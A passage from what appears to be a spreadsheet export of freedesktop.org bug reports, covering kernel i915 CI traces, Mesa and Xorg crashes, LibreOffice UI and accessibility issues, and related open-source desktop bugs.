NTERNALS| define.
The main part looks like this:
-- snip --
#ifdef USE_FT_INTERNALS
static FT_BBox *
FT_Get_PS_Font_BBox( FT_Face face )
{
  const char *driver_name
  FT_BBox    *font_bbox = NULL
  if ( face &amp;&amp; face-&gt;driver &amp;&amp; face-&gt;driver-&gt;root.clazz )
  {
    driver_name = face-&gt;driver-&gt;root.clazz-&gt;module_name
    if ( ft_strcmp( driver_name type1 ) == 0 )
      font_bbox = 
    else if ( ft_strcmp( driver_name t1cid ) == 0 )
      font_bbox = 
    else if ( ft_strcmp( driver_name type42 ) == 0 )
      font_bbox = 
  }
  return font_bbox
}
#endif /* USE_FT_INTERNALS */
-- snip --
Egbert/Chisato:
Any idea how |FT_Get_PS_Font_BBox| can be changed that only public FreeType
APIs are used ?</t>
  </si>
  <si>
    <t>DBUS-99758</t>
  </si>
  <si>
    <t>dbus-object-tree: Correctly report failure from an internal test</t>
  </si>
  <si>
    <t>Trivial patch to shut Coverity up and ensure that OOM handling failures in dbus-object-tree arenâ€™t incorrectly reported as successful test passes.
Coverity ID: 54711</t>
  </si>
  <si>
    <t>DRI-108690</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@gem_exec_reuse@baggage - dmesg-warn - ODEBUG: Out of memory. ODEBUG disabled</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5096/shard-apl8/igt@gem_exec_reuse@baggage.html
 [630.362731] [IGT] gem_exec_reuse: starting subtest baggage
 [682.800570] [IGT] gem_exec_reuse: exiting ret=0
 [685.973846] Console: switching to colour frame buffer device 240x67
 [697.383196] ODEBUG: Out of memory. ODEBUG disabled
 [698.591841] stack segment: 0000 [#1] PREEMPT SMP NOPTI
 [698.591905] CPU: 0 PID: 12 Comm: kworker/0:1 Tainted: G     U            4.20.0-rc1-CI-CI_DRM_5096+ #1
 [698.591974] Hardware name:  /NUC6CAYB BIOS AYAPLCEL.86A.0049.2018.0508.1356 05/08/2018
 [698.592041] Workqueue: events free_obj_work
 [698.592078] RIP: 0010:free_obj_work+0x143/0x210
 [698.592116] Code: dd 00 00 00 49 bd 00 01 00 00 00 00 ad de 49 bc 00 02 00 00 00 00 ad de 48 89 43 08 4c 89 2e 4c 89 66 08 e8 3f 0e d6 ff eb 16  89 45 08 48 89 de 4c 89 2b 4c 89 63 08 48 89 eb e8 27 0e d6 ff
 [698.592247] RSP: 0018:ffffc9000007fe30 EFLAGS: 00010202
 [698.592288] RAX: ffffc9000007fe30 RBX: ffff8801529c5d68 RCX: 0000000000000001
 [698.592342] RDX: 0000000080000001 RSI: 00000000ffffffff RDI: ffff880276816a80
 [698.592395] RBP: 6b6b6b6b6b6b6b6b R08: 0000000000000000 R09: 0000000000000001
 [698.592448] R10: 0000000000000000 R11: 0000000000000000 R12: dead000000000200
 [698.592500] R13: dead000000000100 R14: 0000000000000000 R15: 0000000000000000
 [698.592554] FS:  0000000000000000(0000) GS:ffff880277a00000(0000) knlGS:0000000000000000
 [698.592614] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [698.592658] CR2: 0000564ee3e10f28 CR3: 000000026e5c4000 CR4: 00000000003406f0
 [698.592711] Call Trace:
 [698.592740]  process_one_work+0x262/0x630
 [698.592779]  worker_thread+0x37/0x380
 [698.592812]  ? process_one_work+0x630/0x630
 [698.592847]  kthread+0x119/0x130
 [698.592876]  ? kthread_park+0x80/0x80
 [698.592911]  ret_from_fork+0x3a/0x50
 [698.592947] Modules linked in: vgem snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic i915 x86_pkg_temp_thermal coretemp crct10dif_pclmul crc32_pclmul ghash_clmulni_intel snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core lpc_ich snd_pcm r8169 mei_me prime_numbers mei pinctrl_broxton pinctrl_intel</t>
  </si>
  <si>
    <t>LIBREOFFICE-73243</t>
  </si>
  <si>
    <t>ACCESSIBILITY: [a11y] Thumbnail View in StartCenter and Template Manager not firing focus on List elements with keyboard movements</t>
  </si>
  <si>
    <t>Thumbnail View in StartCenter and Template Manager is not firing focus on List elements during keyboard navigation.
Mouse over events over the Thumbnail UI are now triggering cursor and program focus (resolves major part of Bug 71765).
But keyboard movement focus events are not being fired for the Thumbnail list elements of SC and TM when only keyboard navigation is used. Impacting Accessibility.
Steps to reproduce:
Launch an AT (NVDA Orca)
Launch a monitoring probe (Accprobe Accerciser)
Launch LibreOffice
Navigate into the Thumbnail View list of the StartCenter with TAB keys. Use cursor keys to traverse any of the recent documents.  No accessibility focus events are fired.
Alternatively launch the Template Manager and navigate to a populated Thumbnail View  -- e.g. the Presentation tab. TAB onto the Thumbnail View list. Use the cursor keys to traverse any of the template present. No accessibility focus events are fired.
Expected: Navigation between the list objects of the Thumbnail View(s) should generate both cursor and focus events consumable by AT.</t>
  </si>
  <si>
    <t>XORG-1198</t>
  </si>
  <si>
    <t>bad HorizSync and VertRefresh on ViewSonic monitors</t>
  </si>
  <si>
    <t>When I run X -configure in 6.8.0rc2 and 6.7.0 HorizSync and Verrefresh gets bad 
value:
#       HorizSync    14387.0 - 0.0
#       HorizSync    30.0 - 54.0
#       VertRefresh  809058880.0 - 808529984.0
        HorizSync    30.0 - 54.0
        VertRefresh  50-100
commented values are what was in original xorg.conf.new uncommented --- the 
real values.
This bug was found on my Viewsonic E641 on R100 at home (Slackware 10) and on 
Viewsonic E651 on riva TNT2 at my job (Gentoo).
Old Xfree86 4.3.0 detects this settings correctly.</t>
  </si>
  <si>
    <t>dn2010</t>
  </si>
  <si>
    <t>TELEPATHY-31136</t>
  </si>
  <si>
    <t>Add some explanation for the separation of Call.Content.I.Media</t>
  </si>
  <si>
    <t>It's not immediately obvious why the Media interface needs to be separate from the Call.Content object itself.  It would be nice if this was justified and explained a little bit better in the documentation.</t>
  </si>
  <si>
    <t>DRI-100247</t>
  </si>
  <si>
    <t>[BAT][SNB] Warn on igt@gem_ctx_create@basic-files in CI</t>
  </si>
  <si>
    <t>Got the following trace when running igt@gem_ctx_create@basic-files on fi-snb-2520m with CI_DRM_2355:
[   99.153133] ------------[ cut here ]------------
[   99.153193] WARNING: CPU: 1 PID: 7165 at drivers/gpu/drm/i915/intel_uncore.c:232 __gen6_gt_wait_for_fifo+0xae/0xc0 [i915]
[   99.153195] WARN_ON(loop &lt; 0 &amp;&amp; fifo &lt;= 20)
[   99.153197] Modules linked in: x86_pkg_temp_thermal intel_powerclamp snd_hda_codec_hdmi coretemp snd_hda_codec_generic crct10dif_pclmul snd_hda_intel crc32_pclmul snd_hda_codec snd_hwdep snd_hda_core ghash_clmulni_intel mei_me snd_pcm mei lpc_ich i915 sdhci_pci sdhci mmc_core e1000e ptp pps_core prime_numbers
[   99.153238] CPU: 1 PID: 7165 Comm: gem_ctx_create Not tainted 4.11.0-rc2-CI-CI_DRM_2355+ #1
[   99.153240] Hardware name: LENOVO 42962WU/42962WU BIOS 8DET56WW (1.26 ) 12/01/2011
[   99.153242] Call Trace:
[   99.153247]  dump_stack+0x67/0x92
[   99.153252]  __warn+0xc6/0xe0
[   99.153256]  warn_slowpath_fmt+0x4a/0x50
[   99.153279]  __gen6_gt_wait_for_fifo+0xae/0xc0 [i915]
[   99.153299]  gen6_write32+0x189/0x2a0 [i915]
[   99.153319]  i9xx_submit_request+0x3e/0x50 [i915]
[   99.153339]  submit_notify+0x3f/0x5c [i915]
[   99.153355]  __i915_sw_fence_complete+0x176/0x220 [i915]
[   99.153358]  ? debug_object_activate+0xe2/0x1e0
[   99.153375]  i915_sw_fence_complete+0x25/0x40 [i915]
[   99.153391]  i915_sw_fence_commit+0x1c/0x30 [i915]
[   99.153410]  __i915_add_request+0x238/0x540 [i915]
[   99.153430]  i915_gem_do_execbuffer.isra.16+0x157e/0x1b70 [i915]
[   99.153433]  ? __lock_acquire+0x45b/0x1bb0
[   99.153437]  ? __might_fault+0x3e/0x90
[   99.153460]  i915_gem_execbuffer2+0xb5/0x220 [i915]
[   99.153465]  drm_ioctl+0x200/0x450
[   99.153469]  ? __slab_free+0x39f/0x4f0
[   99.153486]  ? i915_gem_execbuffer+0x330/0x330 [i915]
[   99.153492]  ? putname+0x4f/0x60
[   99.153496]  do_vfs_ioctl+0x90/0x6e0
[   99.153499]  ? entry_SYSCALL_64_fastpath+0x5/0xb1
[   99.153503]  ? __this_cpu_preempt_check+0x13/0x20
[   99.153506]  ? trace_hardirqs_on_caller+0xe7/0x200
[   99.153509]  SyS_ioctl+0x3c/0x70
[   99.153513]  entry_SYSCALL_64_fastpath+0x1c/0xb1
[   99.153516] RIP: 0033:0x7f9c60d44357
[   99.153518] RSP: 002b:00007ffc39a15108 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[   99.153521] RAX: ffffffffffffffda RBX: ffffffff8147ea93 RCX: 00007f9c60d44357
[   99.153523] RDX: 00007ffc39a151e0 RSI: 0000000040406469 RDI: 0000000000000005
[   99.153525] RBP: ffffc900006dbf88 R08: 0000000000000005 R09: 0000000000000000
[   99.153526] R10: 0000000000000021 R11: 0000000000000246 R12: 0000000000000000
[   99.153528] R13: 0000000000000005 R14: 0000000040406469 R15: 000000000000023d
[   99.153532]  ? __this_cpu_preempt_check+0x13/0x20
[   99.153537] ---[ end trace f5861f5a24c919de ]---
Raw results: https://intel-gfx-ci.01.org/CI/CI_DRM_2355/fi-snb-2520m/igt@gem_ctx_create@basic-files.html</t>
  </si>
  <si>
    <t>LIBREOFFICE-88241</t>
  </si>
  <si>
    <t>Sidebar: Undocked sidebar opened by call to Styles and Formatting is not dismissed with another call</t>
  </si>
  <si>
    <t>Description:
Summoning the Styles and Formatting dialog when the sidebar is in undocked mode opens the floating sidebar pointed to Styles and Formatting as it should.  (Well mostly as it should since you'll run into bug 83546.)  Attempting to call the Styles and Formatting dialog again should dismiss the sidebar.  This would make it behave exactly like the old Styles and Formatting dialog.  Unfortunately 
Steps to reproduce:
1. Start new writer document
2. Make sure the sidebar is undocked (sidebar menu -&gt; undock)
3. Fully close sidebar if it's up (view -&gt; uncheck sidebar)  Note that you currently can't close the sidebar using the X in the window decorations as this will tickle bug 87217 and simply reenable the normal sidebar.
4. Summon Styles and Formatting  (Press the F11 key or Format-&gt;Styles and Formatting)
5. Attempt to dismiss Styles and Formatting sidebar (Press the F11 key or Format-&gt;Styles and Formatting)
Expected:
This second calling of Styles and Formatting should dismiss the current floating sidebar and behave exactly like the old dialog in 4.3 and below.
Actual:
The floating sidebar stays activated and pointed to Styles and Formatting.  This is probably due to undocked sidebars are not able to minimize down to just a strip of activator buttons like a normal docked sidebar.  
Notes:
Of course if we had another sidebar component activated another call to Styles and Formatting should simply switch to the Styles and Formatting component instead of dismissing the sidebar.  I think this would be the most intuitive behavior.
This same behavior should also be applied to opening/dismissing the gallery navigator and any other sidebar categories.
I tested this under LibreOffice 4.4.0.1 rc1 using 32bit Fedora17.</t>
  </si>
  <si>
    <t>LIBREOFFICE-52389</t>
  </si>
  <si>
    <t>FILEOPEN: Last character deleted in some RTF files</t>
  </si>
  <si>
    <t>In version 3.5.5.3 (and older 3.5 versions) upon opening an RTF document the last character of the document disappears.</t>
  </si>
  <si>
    <t>wojciech</t>
  </si>
  <si>
    <t>UIM-24728</t>
  </si>
  <si>
    <t>bridge: Qt</t>
  </si>
  <si>
    <t>A menu on a tool button appears at an incorrect position in plasmoid</t>
  </si>
  <si>
    <t>Separated from bug #24620.
- A menu on a tool button and a context menu appear at an incorrect position
  in this plasmoid.
  I suspect this nasty issue is relevant to this bug in Qt:
    249306 - QToolButton popup menu is shown at wrong position when embedded
    in a QGraphicsView
http://qt.nokia.com/developer/task-tracker/index_html?method=entry&amp;id=249306
  (Plasma::PopupApplet inherits Plasma::Applet and Plasma::Applet inherits
  QGraphicsProxyWidget)</t>
  </si>
  <si>
    <t>MESA-91551</t>
  </si>
  <si>
    <t>DXTn compressed normal maps produce severe artifacts on all NV5x and NVDx chipsets</t>
  </si>
  <si>
    <t>Created attachment 117508
Snapshot of the artifacts with normal map
Light blue garbled artifacts are affecting gallium nouveau on FreeSpace2 open source with Star Wars : Original Trilogy mod.
To Star Wars fans this may be unacceptable :-) so let't try to find clues to the problem
I have checked the .dds normal map's texture compression format and in this mod it's always DXT5
If I disable 'normal maps' in wxLauncher there are no artifacts but there are also no maps which are one the beauties of the mod.
Affected chipsets NV6x (GeForce 7025) NV8x (GeForce 8500 8600) NV9x (GeForce 9600GT GT120)  NVAx (GeForce 210) and NVDx (GeForce GT610). (cheched mesa with 10.6.x)
Unaffected meaning normal maps are fine with those: NVCx and NVEx chipsets (checked with mesa 10.6.x and 11.0.0devel git)
NOTE: It's strange that NVDx chipsets are affected if they rely on nvc0 driver
You can find in the attachment the snapshot of the artifacts with normal maps and  normal maps disabled (no artifacts) plus other log files/extracts.
Mauro</t>
  </si>
  <si>
    <t>DRI-106684</t>
  </si>
  <si>
    <t>[CI] igt@.* - dmesg-warn/dmesg-fail - *ERROR* rcs0: reset request timeout</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_38/fi-kbl-r/igt@kms_vblank@pipe-c-ts-continuation-suspend.html
[  164.306394] [drm:gen8_reset_engines [i915]] *ERROR* rcs0: reset request timeout
[  164.306417] ------------[ cut here ]------------
[  164.306423] WARN_ON(intel_gpu_reset(i915 (~0)))
[  164.306536] WARNING: CPU: 4 PID: 1370 at drivers/gpu/drm/i915/i915_gem.c:4978 i915_gem_sanitize+0x4d/0x80 [i915]
[  164.306540] Modules linked in: vgem snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic i915 snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core btusb btrtl asix btbcm usbnet btintel mii x86_pkg_temp_thermal intel_powerclamp coretemp crct10dif_pclmul bluetooth crc32_pclmul ghash_clmulni_intel snd_pcm e1000e ecdh_generic mei_me mei prime_numbers pinctrl_sunrisepoint pinctrl_intel
[  164.306653] CPU: 4 PID: 1370 Comm: kworker/u16:31 Tainted: G     U  W         4.17.0-rc4-gfe5bde58dca5-drmtip_38+ #1
[  164.306657] Hardware name: Intel Corporation Kabylake Client platform/Kabylake R DDR4 RVP BIOS KBLSE2R1.R00.X078.P02.1703030515 03/03/2017
[  164.306665] Workqueue: events_unbound async_run_entry_fn
[  164.306734] RIP: 0010:i915_gem_sanitize+0x4d/0x80 [i915]
[  164.306738] RSP: 0018:ffffb658009d7cc8 EFLAGS: 00010286
[  164.306746] RAX: 0000000000000000 RBX: ffff99fb26300000 RCX: 0000000000000001
[  164.306750] RDX: 0000000080000001 RSI: ffffffff990fb2c9 RDI: 00000000ffffffff
[  164.306755] RBP: ffff99fb26300068 R08: 000000007b7b9455 R09: 0000000000000000
[  164.306759] R10: 0000000000000000 R11: 0000000000000000 R12: ffff99fb263089b0
[  164.306763] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
[  164.306768] FS:  0000000000000000(0000) GS:ffff99fb3ed00000(0000) knlGS:0000000000000000
[  164.306772] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  164.306777] CR2: 000055eeee61bd80 CR3: 0000000218210005 CR4: 00000000003606e0
[  164.306781] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  164.306785] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  164.306788] Call Trace:
[  164.306857]  i915_gem_suspend+0xec/0x140 [i915]
[  164.306913]  i915_drm_suspend+0x5f/0x160 [i915]
[  164.306925]  pci_pm_suspend+0x7c/0x130
[  164.306934]  ? pci_pm_freeze+0xc0/0xc0
[  164.306941]  dpm_run_callback+0x5d/0x2f0
[  164.306953]  __device_suspend+0x11f/0x600
[  164.306965]  ? dpm_watchdog_set+0x60/0x60
[  164.306982]  async_suspend+0x15/0x90
[  164.306990]  async_run_entry_fn+0x34/0x160
[  164.306999]  process_one_work+0x229/0x6a0
[  164.307017]  worker_thread+0x35/0x380
[  164.307028]  ? process_one_work+0x6a0/0x6a0
[  164.307033]  kthread+0x119/0x130
[  164.307040]  ? _kthread_create_on_node+0x60/0x60
[  164.307052]  ret_from_fork+0x3a/0x50
[  164.307075] Code: e0 03 00 84 c0 74 f1 be ff ff ff ff 48 89 df e8 5a de 03 00 85 c0 74 e0 48 c7 c6 c0 13 84 c0 48 c7 c7 1d 90 82 c0 e8 93 c8 96 d7  0b eb c9 48 8d 6f 68 31 f6 48 89 ef e8 81 88 22 d8 48 89 df 
[  164.307290] irq event stamp: 466
[  164.307297] hardirqs last  enabled at (465): [] vprintk_emit+0x4b7/0x4d0
[  164.307304] hardirqs last disabled at (466): [] error_entry+0x7c/0x100
[  164.307310] softirqs last  enabled at (438): [] __do_softirq+0x32b/0x4e1
[  164.307317] softirqs last disabled at (419): [] irq_exit+0xa4/0xb0
[  164.307382] WARNING: CPU: 4 PID: 1370 at drivers/gpu/drm/i915/i915_gem.c:4978 i915_gem_sanitize+0x4d/0x80 [i915]
[  164.307387] ---[ end trace ea2cd5ae9e8d1a54 ]---
[  179.976608] [drm:gen8_reset_engines [i915]] *ERROR* rcs0: reset request timeout
[  179.976613] ------------[ cut here ]------------
[  179.976615] WARN_ON(intel_gpu_reset(i915 (~0)))
[  179.976652] WARNING: CPU: 5 PID: 1400 at drivers/gpu/drm/i915/i915_gem.c:4978 i915_gem_sanitize+0x4d/0x80 [i915]
[  179.976654] Modules linked in: vgem snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic i915 snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core btusb btrtl asix btbcm usbnet btintel mii x86_pkg_temp_thermal intel_powerclamp coretemp crct10dif_pclmul bluetooth crc32_pclmul ghash_clmulni_intel snd_pcm e1000e ecdh_generic mei_me mei prime_numbers pinctrl_sunrisepoint pinctrl_intel
[  179.976692] CPU: 5 PID: 1400 Comm: kworker/u16:61 Tainted: G     U  W         4.17.0-rc4-gfe5bde58dca5-drmtip_38+ #1
[  179.976693] Hardware name: Intel Corporation Kabylake Client platform/Kabylake R DDR4 RVP BIOS KBLSE2R1.R00.X078.P02.1703030515 03/03/2017
[  179.976697] Workqueue: events_unbound async_run_entry_fn
[  179.976720] RIP: 0010:i915_gem_sanitize+0x4d/0x80 [i915]
[  179.976722] RSP: 0018:ffffb65800b67d90 EFLAGS: 00010282
[  179.976724] RAX: 0000000000000000 RBX: ffff99fb26300000 RCX: 0000000000000001
[  179.976726] RDX: 0000000080000001 RSI: ffffffff990fb2c9 RDI: 00000000ffffffff
[  179.976727] RBP: 0000000000000000 R08: 000000001362165f R09: 0000000000000000
[  179.976728] R10: 0000000000000000 R11: 0000000000000000 R12: ffff99fb34ce33f8
[  179.976730] R13: ffffffffc06b8e90 R14: 0000000000000000 R15: 0000000000000000
[  179.976731] FS:  0000000000000000(0000) GS:ffff99fb3ed40000(0000) knlGS:0000000000000000
[  179.976733] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  179.976734] CR2: 00007fddd6e93320 CR3: 0000000218210006 CR4: 00000000003606e0
[  179.976735] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  179.976737] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  179.976738] Call Trace:
[  179.976757]  i915_pm_resume_early+0xba/0x150 [i915]
[  179.976762]  dpm_run_callback+0x5d/0x2f0
[  179.976766]  device_resume_early+0xa6/0xe0
[  179.976769]  async_resume_early+0x14/0x40
[  179.976772]  async_run_entry_fn+0x34/0x160
[  179.976775]  process_one_work+0x229/0x6a0
[  179.976780]  worker_thread+0x35/0x380
[  179.976784]  ? process_one_work+0x6a0/0x6a0
[  179.976786]  kthread+0x119/0x130
[  179.976788]  ? _kthread_create_on_node+0x60/0x60
[  179.976793]  ret_from_fork+0x3a/0x50
[  179.976799] Code: e0 03 00 84 c0 74 f1 be ff ff ff ff 48 89 df e8 5a de 03 00 85 c0 74 e0 48 c7 c6 c0 13 84 c0 48 c7 c7 1d 90 82 c0 e8 93 c8 96 d7  0b eb c9 48 8d 6f 68 31 f6 48 89 ef e8 81 88 22 d8 48 89 df 
[  179.976865] irq event stamp: 2034
[  179.976868] hardirqs last  enabled at (2033): [] vprintk_emit+0x4b7/0x4d0
[  179.976871] hardirqs last disabled at (2034): [] error_entry+0x7c/0x100
[  179.976873] softirqs last  enabled at (1990): [] __do_softirq+0x32b/0x4e1
[  179.976876] softirqs last disabled at (1981): [] irq_exit+0xa4/0xb0
[  179.976898] WARNING: CPU: 5 PID: 1400 at drivers/gpu/drm/i915/i915_gem.c:4978 i915_gem_sanitize+0x4d/0x80 [i915]
[  179.976899] ---[ end trace ea2cd5ae9e8d1a55 ]---
[  180.308829] atkbd serio0: Failed to deactivate keyboard on isa0060/serio0
[  180.692902] atkbd serio0: Failed to enable keyboard on isa0060/serio0
[  184.174560] i915 0000:00:02.0: Resetting bcs0 for hang on bcs0 vcs0 vecs0
[  184.175977] [drm:gen8_reset_engines [i915]] *ERROR* bcs0: reset request timeout
[  184.176204] i915 0000:00:02.0: Resetting vcs0 for hang on bcs0 vcs0 vecs0
[  184.177631] [drm:gen8_reset_engines [i915]] *ERROR* vcs0: reset request timeout
[  184.177877] i915 0000:00:02.0: Resetting vecs0 for hang on bcs0 vcs0 vecs0
[  184.179202] [drm:gen8_reset_engines [i915]] *ERROR* vecs0: reset request timeout
[  184.179643] i915 0000:00:02.0: Resetting chip for hang on bcs0 vcs0 vecs0
[  184.182779] [drm:gen8_reset_engines [i915]] *ERROR* rcs0: reset request timeout
[  184.287322] [drm:gen8_reset_engines [i915]] *ERROR* rcs0: reset request timeout
[  184.391364] [drm:gen8_reset_engines [i915]] *ERROR* rcs0: reset request timeout
[  184.491896] i915 0000:00:02.0: Failed to reset chip
[  184.498061] [drm:gen8_reset_engines [i915]] *ERROR* rcs0: reset request timeout</t>
  </si>
  <si>
    <t>XORG-18864</t>
  </si>
  <si>
    <t>2d corruption with latest radeon git</t>
  </si>
  <si>
    <t>Created attachment 20763
Screenshot showing the problems
I'm seeing some 2D rendering problems with the latest radeon git driver there were some horizontal lines under text in metacity window titles and the firefox address bar and one or two characters in gnome-terminal became messed up. Using EXA.
If I did git bisect correctly then fc079c5267baf431bbecee7744e484783d393152 was the first bad commit:
commit fc079c5267baf431bbecee7744e484783d393152
Author: Dave Airlie 
Date:   Tue Dec 2 22:11:57 2008 -0500
    Don't mix 2D and 3D in the same IB
    fix from radeon-gem-cs
Radeon 9550 (RV350) Fedora 10 with kernel modesetting disabled:
kernel-2.6.27.5-117.fc10.i686
xorg-x11-server-Xorg-1.5.3-5.fc10.i386
libdrm-2.4.0-0.21.fc10.i386</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-42922</t>
  </si>
  <si>
    <t>Add mimetype for visio document</t>
  </si>
  <si>
    <t>Created attachment 53526
A simple test Visio document
Please add mimetype for Visio documents that can be handled with the upcoming LibreOffice 3.5 using libvisio (http://cgit.freedesktop.org/libreoffice/contrib/libvisio/)
It is a simple ole2 documents that must contain VisioDocument stream.
The IANA database uses mimetype application/vnd.visio
The extensions are vsd vst vsw vss</t>
  </si>
  <si>
    <t>XQUARTZ-92650</t>
  </si>
  <si>
    <t>New Bugs</t>
  </si>
  <si>
    <t>Clipboard Syncing Not Working Properly</t>
  </si>
  <si>
    <t>This is refiling https://xquartz.macosforge.org/trac/ticket/519 which I just encountered.
Tested on OS X 10.10.5 XQuartz 2.7.8.
Syncing between system pasteboard and X clipboard doesn't work until you go to XQuartz preferences / Pasteboard uncheck Enable syncing and re-enable it again.
I have XQuartz configured to enable syncing between system pasteboard and X11 CLIPBOARD. (Enable syncing and Update pasteboard when CLIPBOARD changes are both checked)
I reproduced by ssh'ing to a Linux box (with trusted X11 forwarding ssh -Y) then echo foo | xclip -selection clipboard then tried to paste in a separate OS X terminal window (either using Command-V or with pbpaste). Didn't work. I then went to XQuartz settings unchecked Enabled syncing re-enabled it tried again and it worked.</t>
  </si>
  <si>
    <t>tudorb</t>
  </si>
  <si>
    <t>PULSEAUDIO-80809</t>
  </si>
  <si>
    <t>There is no remap method for 8bit mono sound</t>
  </si>
  <si>
    <t>Dear developer
There is no remap method for 8bit mono sound.
PulseAudio server would be crashed during playing 8bit mono sound with stereo sink.
Could you please add 8bit remap support?
Thank you very much.</t>
  </si>
  <si>
    <t>cunshangzhishu</t>
  </si>
  <si>
    <t>MESA-4022</t>
  </si>
  <si>
    <t>static_assert macro in slang_utility.h doesn't work with gcc</t>
  </si>
  <si>
    <t>Mesa/src/mesa/shader/slang/slang_utility.h contains this bit of hackery to
make assertions at compile time:
#define static_assert(expr) do { int _array[(expr) ? 1 : 0] _array[0] } while
(0)
Unfortunately one of gcc's extensions causes it to think there's nothing wrong
with a zero length array so this doesn't trigger an error in gcc when the
assertion is false.   To do that the array length needs to be changed from 0 
to -1 since gcc agrees that an array of negative length is indeed an error.
However once this bug is fixed slang_execute.c will become unbuildable with
gcc on 64-bit machines due to bug #4021.</t>
  </si>
  <si>
    <t>DEJAVU-28189</t>
  </si>
  <si>
    <t>Upper Attachment point on 018F is missing</t>
  </si>
  <si>
    <t>Created attachment 35775
Example of Attachment point issue over 018F
Combining marks above the uppercase schwa (U+018F) collide with the base character. I believe this is indicative that U+018F is missing an attachment point since combining marks on similar characters (such as (U+018E) render properly. 
Interestingly 
DejaVu Sans Mono renders properly
DejaVu Serif Bold and DejaVu Bold Italic renders properly
DejaVu Serif Condensed Bold and DejaVu Condensed Bold Italic renders properly</t>
  </si>
  <si>
    <t>lorna_priest</t>
  </si>
  <si>
    <t>MESA-41184</t>
  </si>
  <si>
    <t>glxgears hang GPU on Sandy Bridge</t>
  </si>
  <si>
    <t>Created attachment 51590
i915_error_state
Running glxgears for more than 10 secs causes GPU hang:
[125537.901951] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung
[125537.901959] [drm] capturing error event look for more information in /debug/dri/0/i915_error_state
[125537.917763] [drm:i915_wait_request] *ERROR* i915_wait_request returns -11 (awaiting 3472039 at 3472038 next 3472041)
I use kernel 3.1.0-rc7+. I got Mesa 7.11 from Ubuntu/unstable distro as well as glxgears. 
This bug seems to be reproducible.
I attached i915_error_state.</t>
  </si>
  <si>
    <t>TELEPATHY-31098</t>
  </si>
  <si>
    <t>ClientTypes tests</t>
  </si>
  <si>
    <t>I wrote some tests for client types. Check it out.</t>
  </si>
  <si>
    <t>MESA-96911</t>
  </si>
  <si>
    <t>webgl2 conformance2/textures/misc/tex-mipmap-levels.html crashes 12.1 Intel driver</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Launch latest Chrome browser on Linux with GEN graphics with following options --single-process --enable-unsafe-es3-apis https://www.khronos.org/registry/webgl/sdk/tests/conformance2/textures/misc/tex-mipmap-levels.html?webglVersion=2&amp;quiet=0
2. The driver would crash. (Without --single-process option you may see TEST COMPLETE. But actually the driver already crashes as if you refresh the page you will see WebGL hit a snag notification).
Using debug version of driver I saw below stack. The problem is intel_tex.c:216: intel_map_texture_image: Assertion `mt' failed.
#0  0x00007fffef696267 in __GI_raise (sig=sig@entry=6)
    at ../sysdeps/unix/sysv/linux/raise.c:55
#1  0x00007fffef697eca in __GI_abort () at abort.c:89
#2  0x00007fffef68f03d in __assert_fail_base (fmt=0x7fffef7f0fe8 %s%s%s:%u: %s%sAssertion `%s' failed.\n%n assertion=assertion@entry=0x7fffc8e4bb53 mt file=file@entry=0x7fffc8e5d301 intel_tex.c line=line@entry=216 function=function@entry=0x7fffc8e5d420  intel_map_texture_image)
    at assert.c:92
#3  0x00007fffef68f0f2 in __GI___assert_fail (assertion=assertion@entry=0x7fffc8e4bb53 mt file=file@entry=0x7fffc8e5d301 intel_tex.c line=line@entry=216 function=function@entry=0x7fffc8e5d420  intel_map_texture_image) at assert.c:101
#4  0x00007fffc8cd537b in intel_map_texture_image (ctx= tex_image= slice= x= y= w= h=0 mode=1 map=0x1191a5670da0 out_stride=0x7fffccec3f40)
    at intel_tex.c:216
#5  0x00007fffc8a07e92 in _mesa_generate_mipmap (srcImage= maxLevel=13 texObj=0x1191a69a3480 target=3553 ctx=0x1191a6934030)
    at main/mipmap.c:1969
#6  0x00007fffc8a07e92 in _mesa_generate_mipmap (ctx=ctx@entry=0x1191a6934030 target=target@entry=3553 texObj=texObj@entry=0x1191a69a3480)
    at main/mipmap.c:2226
#7  0x00007fffc8b06236 in _mesa_meta_GenerateMipmap (ctx=0x1191a6934030 target=---Type  to continue or q  to quit---
3553 texObj=0x1191a69a3480) at drivers/common/meta_generate_mipmap.c:171
#8  0x00007fffc89f3b4e in _mesa_generate_texture_mipmap (ctx=0x1191a6934030 texObj=0x1191a69a3480 target=3553 dsa=) at main/genmipmap.c:155
#9  0x00007ffff4fa7c86 in gpu::gles2::GLES2DecoderImpl::DoGenerateMipmap(unsigned int) ()
    at /workspace/project/chromium/src/out-gn-linux-x86_64/Release/./libgpu.so
#10 0x00007ffff4f85c4e in gpu::gles2::GLES2DecoderImpl::HandleGenerateMipmap(unsigned int void const*) ()
Note: This is a regression in latest code and I can't reproduce it with 11.2 driver.</t>
  </si>
  <si>
    <t>yang.gu</t>
  </si>
  <si>
    <t>XORG-23208</t>
  </si>
  <si>
    <t>XV error in VLC when cropped to 16:9</t>
  </si>
  <si>
    <t>Created attachment 28432
xorg log
Hi. Please see attached screenshot and xorg log. When I crop/zoom to 16:9 in VLC the left hand edge does not update but the rest is OK. So the picture is actually 16:9 but some of the left edge is missing. It looks to be the same amount as the difference between full width and the cropped version.
Not sure if this is a VLC or radeon bug. But I asked in freenode/#radeon and was advised to file this bug.</t>
  </si>
  <si>
    <t>mesa_booger</t>
  </si>
  <si>
    <t>DRI-57945</t>
  </si>
  <si>
